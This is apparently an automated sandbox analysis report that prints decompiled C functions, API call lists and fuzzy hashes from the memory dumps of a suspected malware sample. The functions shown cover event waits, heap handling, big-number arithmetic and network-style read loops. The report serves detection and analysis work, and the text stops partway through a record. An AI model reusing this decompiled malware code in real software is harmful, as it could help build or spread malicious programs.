Instruction ID: 47ccdf3a608e837678cf46b12bb7b98b29d23d2b31462b7e653985397ac725e8
Opcode Fuzzy Hash: 28b63bd61ad2279dbb2f3167eb8987389bb7a11fd95fe71afc4681a23947364d
Instruction Fuzzy Hash: A9515E75D40509EFCB00DFA8C899DEEF7BAEF89704B148599E915EB210D732AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D78CF, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 6E1D7993
__fileno.LIBCMT ref: 6E1D79B3
__locking.LIBCMT ref: 6E1D79BA
__flsbuf.LIBCMT ref: 6E1D79E5

Part of subcall function 6E1D8C2B: __getptd_noexit.LIBCMT ref: 6E1D8C2B

Part of subcall function 6E1D6B47: __decode_pointer.LIBCMT ref: 6E1D6B52

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 6f3d9d1881701bf8a52d60968634c7a9a83557c85b61e262406e1b402bd53dd6
Instruction ID: ecdeab048e3f5883267fb70ae4acfb45b5dcf2cec8725723e46331b7dbbb40db
Opcode Fuzzy Hash: 6f3d9d1881701bf8a52d60968634c7a9a83557c85b61e262406e1b402bd53dd6
Instruction Fuzzy Hash: 2741E732A00606DFDB05CFE9C85099EB7B6AF90374B35892AE465971C0E770DAC9EB40

Uniqueness

Uniqueness Score: -1.00%

Function 02EA53C6, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02EA53C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02EA1AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02EA50FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02EA5745(_t101,  &_v236, _a8, _t96 - _t81);
					E02EA5745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02EA50FF(_t101, 0x2ead1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02EA50FF(_a16, _a4);
						E02EA5088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02EAAF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02EAAF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02EA5F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02EA90C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02EA6044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2ead1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02ea53c9
0x02ea53d5
0x02ea53db
0x02ea53e0
0x02ea53e4
0x02ea5541
0x02ea5545
0x02ea5545
0x02ea53ea
0x02ea53ee
0x02ea53f2
0x02ea53f5
0x02ea5400
0x02ea5406
0x02ea540b
0x02ea540e
0x02ea5428
0x02ea5434
0x02ea543d
0x02ea5447
0x02ea544c
0x02ea544e
0x02ea5451
0x02ea54ff
0x02ea5505
0x02ea5516
0x02ea5529
0x02ea5539
0x00000000
0x02ea553e
0x02ea545a
0x02ea5461
0x02ea5465
0x02ea546b
0x02ea546d
0x02ea546f
0x02ea5471
0x02ea5473
0x02ea547d
0x02ea5482
0x02ea5484
0x02ea5486
0x02ea5487
0x02ea5488
0x02ea5489
0x02ea5490
0x02ea5497
0x02ea549a
0x02ea549a
0x02ea5467
0x02ea5467
0x02ea5467
0x02ea54a2
0x02ea54aa
0x02ea54b3
0x02ea54b8
0x02ea54b8
0x02ea54bd
0x00000000
0x00000000
0x02ea54bf
0x02ea54c2
0x02ea54cc
0x00000000
0x00000000
0x02ea54ce
0x02ea54ce
0x02ea54d8
0x02ea54b8
0x02ea54bd
0x00000000
0x00000000
0x00000000
0x02ea54bd
0x02ea54e2
0x02ea54e5
0x02ea54e8
0x02ea54ef
0x02ea54ef
0x02ea54fc
0x00000000
0x02ea54fc
0x02ea53f7
0x02ea53fb
0x02ea53fc
0x02ea53fe
0x00000000
0x00000000
0x00000000
0x02ea53fe
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02EA5473
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02EA5489
memset.NTDLL ref: 02EA5529
memset.NTDLL ref: 02EA5539

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: c2e62486e21d4eee03ed4875fc5d57196575100671457066e8eb9c6526cbe7cd
Instruction ID: a33bbcc55be87a402f56ec0e4fd9c33db28b08377ecf30d9e0fc6f0431e772f6
Opcode Fuzzy Hash: c2e62486e21d4eee03ed4875fc5d57196575100671457066e8eb9c6526cbe7cd
Instruction Fuzzy Hash: BC418071A40209ABDB209FA8CC91BEE7776EF44310F50D529B91AAF180DB70BD59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EAA81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74B04D40), ref: 02EAA82E

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

ResetEvent.KERNEL32(?), ref: 02EAA8A2
GetLastError.KERNEL32 ref: 02EAA8C5
GetLastError.KERNEL32 ref: 02EAA970

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 714b22482e70e71c0441dcddd132022f4e37b7bfadf2b2f161113d47ab66ce6e
Instruction ID: fa6dbec47ac0642a9f705e0527a1d2f179172fdfebc3b60bfd4f03cf8ee90813
Opcode Fuzzy Hash: 714b22482e70e71c0441dcddd132022f4e37b7bfadf2b2f161113d47ab66ce6e
Instruction Fuzzy Hash: CB4181B1980304BFD7319FA2DC98EAB7BBDEB89704B108929F542D6690D731B595CB30

Uniqueness

Uniqueness Score: -1.00%

Function 02EA15FF, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02EA15FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x2ead134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2ead164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02EAA71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x2ead134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02EA5646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02EAA734(_v16);
										if(_t64 == 0) {
											_t64 = E02EA70CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02EA5646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02EA9242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02ea15ff
0x02ea1600
0x02ea1606
0x02ea1611
0x02ea1611
0x02ea1613
0x02ea18e7
0x02ea18ec
0x02ea18ee
0x02ea18f3
0x02ea18f4
0x02ea18f9
0x02ea18fa
0x02ea1905
0x02ea1936
0x02ea193b
0x02ea19fe
0x02ea1941
0x02ea1948
0x02ea1950
0x02ea19fb
0x02ea1956
0x02ea195b
0x02ea1960
0x02ea1965
0x02ea19ed
0x02ea196b
0x02ea196b
0x02ea196d
0x02ea1973
0x02ea1974
0x02ea1974
0x02ea1977
0x02ea197a
0x02ea1980
0x02ea1985
0x02ea1986
0x02ea198b
0x02ea198e
0x02ea1999
0x00000000
0x00000000
0x02ea19a1
0x02ea19a9
0x02ea19b5
0x02ea19b9
0x02ea19bb
0x02ea19c0
0x00000000
0x00000000
0x02ea19c0
0x02ea19b9
0x02ea19d2
0x02ea19d5
0x02ea19dc
0x02ea19e7
0x02ea19e7
0x00000000
0x02ea19c2
0x02ea19c2
0x02ea19c7
0x02ea19c9
0x02ea19ca
0x02ea19cd
0x00000000
0x02ea19cd
0x00000000
0x02ea19c7
0x02ea1974
0x02ea19ee
0x02ea19ee
0x02ea19f4
0x02ea19f4
0x02ea1950
0x02ea1907
0x02ea190d
0x02ea1915
0x02ea192e
0x02ea1930
0x00000000
0x00000000
0x02ea1917
0x02ea1921
0x02ea1925
0x02ea192b
0x00000000
0x02ea192b
0x02ea1925
0x02ea1915
0x02ea1a07
0x02ea1608
0x02ea1608
0x02ea160f
0x02ea161a
0x00000000
0x00000000
0x00000000
0x02ea160f

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 02EA18EE
GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 02EA1907
ResetEvent.KERNEL32(?), ref: 02EA1980
GetLastError.KERNEL32 ref: 02EA199B

Part of subcall function 02EA9242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 02EA9259
Part of subcall function 02EA9242: SetEvent.KERNEL32(?), ref: 02EA9269

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 1d19058a5e976ec02ec457429aa98eb073eda19f281e1e008f7c518da98cccd9
Instruction ID: 04bb55e032e98b71c39b67809034b88a89c445cf4b82310c0b15a68da1998638
Opcode Fuzzy Hash: 1d19058a5e976ec02ec457429aa98eb073eda19f281e1e008f7c518da98cccd9
Instruction Fuzzy Hash: 5C41E732AC0604ABCB219BA5CC54BAE77BABF84358F119529F55ADF190EB30F941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4B4A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1E4B7E
__isleadbyte_l.LIBCMT ref: 6E1E4BB2
MultiByteToWideChar.KERNEL32(00000080,00000009,6E1E0AAD,?,00000000,00000000,?,?,?,?,6E1E0AAD,00000000,?), ref: 6E1E4BE3
MultiByteToWideChar.KERNEL32(00000080,00000009,6E1E0AAD,00000001,00000000,00000000,?,?,?,?,6E1E0AAD,00000000,?), ref: 6E1E4C51

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 20f281de699cc1e56099dae52ea0e44c7c781e411286bc8a2a45e5a1179018a7
Instruction ID: a729f011394e998113ac2833a882146441807e304f31993f8993ebedd5c62965
Opcode Fuzzy Hash: 20f281de699cc1e56099dae52ea0e44c7c781e411286bc8a2a45e5a1179018a7
Instruction Fuzzy Hash: 3931DF30A00646EFDB10CFE4C894AAE3BB4BF01311B2586A8F164CB590D331D9C2EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA11EE, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E02EA11EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t18;
				void* _t24;
				signed int* _t27;
				CHAR* _t29;
				long _t30;
				intOrPtr* _t31;

				_t6 =  *0x2ead270; // 0xd448b889
				_t31 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2ead2a8; // 0xb1a5a8
				_t3 = _t8 + 0x2eae87e; // 0x61636f4c
				_t24 = 0;
				_t29 = E02EA38A8(_t3, 1);
				if(_t29 != 0) {
					_t24 = CreateEventA(0x2ead2ac, 1, 0, _t29);
					E02EAA734(_t29);
				}
				_t12 =  *0x2ead25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t31 == 0) {
					L12:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t30 = E02EA8EA1(_t31, 0);
					if(_t30 == 0 && _t24 != 0) {
						_t30 = WaitForSingleObject(_t24, 0x4e20);
					}
					if(_t27 != 0 && _t30 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E02EAA65C();
					if(_t18 != 0) {
						goto L12;
					}
					_push(0x20);
					_push( *_t31);
					E02EAD10C();
					if(_t18 != 0) {
						 *_t18 = 0;
						_t18 = _t18 + 2;
					}
					_t30 = E02EAA273(0,  *_t31, _t18, 0);
					if(_t30 == 0) {
						if(_t24 == 0) {
							L22:
							return _t30;
						}
						_t30 = WaitForSingleObject(_t24, 0x4e20);
						if(_t30 == 0) {
							L20:
							if(_t24 != 0) {
								CloseHandle(_t24);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02ea11ef
0x02ea11f6
0x02ea1200
0x02ea1204
0x02ea120a
0x02ea1219
0x02ea1220
0x02ea1224
0x02ea1236
0x02ea1238
0x02ea1238
0x02ea123d
0x02ea1244
0x02ea129b
0x02ea129b
0x02ea12a1
0x02ea12a3
0x02ea12a3
0x02ea12ad
0x02ea12b1
0x02ea12c3
0x02ea12c3
0x02ea12c7
0x02ea12cd
0x02ea12cd
0x00000000
0x02ea1254
0x02ea1254
0x02ea125b
0x00000000
0x00000000
0x02ea125d
0x02ea125f
0x02ea1262
0x02ea126a
0x02ea126e
0x02ea1272
0x02ea1272
0x02ea127f
0x02ea1283
0x02ea1287
0x02ea12dc
0x02ea12e2
0x02ea12e2
0x02ea1295
0x02ea1299
0x02ea12d0
0x02ea12d2
0x02ea12d5
0x02ea12d5
0x00000000
0x02ea12d2
0x02ea1299
0x00000000
0x02ea1283

APIs

Part of subcall function 02EA38A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,039C9A98,00000000,?,?,63699BC3,00000005,02EAD00C,?,?,02EA5D30), ref: 02EA38DE
Part of subcall function 02EA38A8: lstrcpy.KERNEL32(00000000,00000000), ref: 02EA3902
Part of subcall function 02EA38A8: lstrcat.KERNEL32(00000000,00000000), ref: 02EA390A

CreateEventA.KERNEL32(02EAD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02EA3760,?,00000001,?), ref: 02EA122F

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

WaitForSingleObject.KERNEL32(00000000,00004E20,02EA3760,00000000,00000000,?,00000000,?,02EA3760,?,00000001,?,?,?,?,02EA52AA), ref: 02EA128F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02EA3760,?,00000001,?), ref: 02EA12BD
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02EA3760,?,00000001,?,?,?,?,02EA52AA), ref: 02EA12D5

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 87f926616193448118386a343f87a14f5953d17b980194046d1a2f52446f9a58
Instruction ID: 1bbbe3ed7b1ee94221788a336c33f3595cb412f65fe4879428cab0af3216cb9a
Opcode Fuzzy Hash: 87f926616193448118386a343f87a14f5953d17b980194046d1a2f52446f9a58
Instruction Fuzzy Hash: 1F210632AC03105BC7315A698C64BAB73E9FF89719F55AA25F90DDF100D760F8409EB4

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9242, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02EA9242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2ead13c; // 0x2eaabf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02EAA71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02EAA734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02EA5646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02ea9242
0x02ea9242
0x02ea924c
0x02ea9252
0x02ea9255
0x02ea9259
0x02ea925f
0x02ea9264
0x02ea927d
0x02ea9280
0x02ea9284
0x02ea9288
0x02ea9289
0x02ea928e
0x02ea9291
0x02ea9298
0x02ea929f
0x02ea92f2
0x02ea92f8
0x02ea92fe
0x02ea9339
0x02ea933f
0x00000000
0x00000000
0x00000000
0x02ea92fe
0x02ea92a5
0x00000000
0x02ea92ac
0x02ea92ba
0x02ea92bd
0x02ea92c0
0x02ea92cc
0x02ea92d0
0x02ea9332
0x02ea92d2
0x02ea92d5
0x02ea92d9
0x02ea92da
0x02ea92db
0x02ea92dd
0x02ea92e4
0x02ea9322
0x02ea932d
0x02ea92e6
0x02ea92e9
0x02ea92ed
0x02ea92ed
0x02ea92e4
0x00000000
0x02ea92d0
0x02ea92a5
0x02ea9269
0x02ea926f
0x02ea9272
0x02ea9277
0x00000000
0x00000000
0x00000000
0x02ea9307
0x02ea930f
0x02ea9314
0x02ea9317
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 02EA9259
SetEvent.KERNEL32(?), ref: 02EA9269
GetLastError.KERNEL32 ref: 02EA92F2

Part of subcall function 02EA5646: WaitForMultipleObjects.KERNEL32(00000002,02EAA8E3,00000000,02EAA8E3,?,?,?,02EAA8E3,0000EA60), ref: 02EA5661

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

GetLastError.KERNEL32(00000000), ref: 02EA9327

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 6b5aa0a41dca8688d5fc923248e5cceafbf29f868189d29be21d5514b9e6d8fe
Instruction ID: 8b79a5f1f0810cc30b9dbfff8849925407e502f2d2d42ce24fbce5033f80763a
Opcode Fuzzy Hash: 6b5aa0a41dca8688d5fc923248e5cceafbf29f868189d29be21d5514b9e6d8fe
Instruction Fuzzy Hash: 1F31F0B5D80309EFDB20DFA5D8D499EB7B8EB08304F10996AE542E7141D730BA49DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA36B1, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E02EA36B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02EA3BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02EA4F79(_t23);
						}
					}
					return _t38;
				}
				if(E02EAA2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2ead2ac, 1, 0,  *0x2ead344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02EAA446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02EA853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02EA4F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02EA11EE( &_v32, _t39);
					goto L13;
				}
			}

0x02ea36b1
0x02ea36be
0x02ea36c4
0x02ea36c5
0x02ea36c6
0x02ea36c7
0x02ea36c8
0x02ea36cc
0x02ea36d8
0x02ea36dc
0x02ea3764
0x02ea3764
0x02ea3767
0x02ea3769
0x02ea3771
0x02ea3771
0x02ea3777
0x02ea377a
0x02ea377a
0x02ea3777
0x02ea3785
0x02ea3785
0x02ea36ef
0x02ea36f1
0x02ea36f1
0x02ea3708
0x02ea370c
0x02ea370f
0x02ea371a
0x02ea3721
0x02ea3721
0x02ea372a
0x02ea372e
0x02ea373c
0x02ea3730
0x02ea3730
0x02ea3731
0x02ea3732
0x02ea3733
0x02ea3734
0x02ea3735
0x02ea3735
0x02ea3741
0x02ea3744
0x02ea3748
0x02ea374a
0x02ea374a
0x02ea3751
0x00000000
0x02ea3753
0x02ea3753
0x02ea3760
0x00000000
0x02ea3760

APIs

CreateEventA.KERNEL32(02EAD2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,02EA52AA,?,00000001,?), ref: 02EA3702
SetEvent.KERNEL32(00000000,?,?,?,02EA52AA,?,00000001,?,00000002,?,?,02EA5D5E,?), ref: 02EA370F
Sleep.KERNEL32(00000BB8,?,?,?,02EA52AA,?,00000001,?,00000002,?,?,02EA5D5E,?), ref: 02EA371A
CloseHandle.KERNEL32(00000000,?,?,?,02EA52AA,?,00000001,?,00000002,?,?,02EA5D5E,?), ref: 02EA3721

Part of subcall function 02EAA446: WaitForSingleObject.KERNEL32(00000000,?,?,?,02EA3741,?,02EA3741,?,?,?,?,?,02EA3741,?), ref: 02EAA520

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 9fad31eab62fe86611a6c50f630feb1e95a2f684b6aa828bdcc9f79d4f8461ea
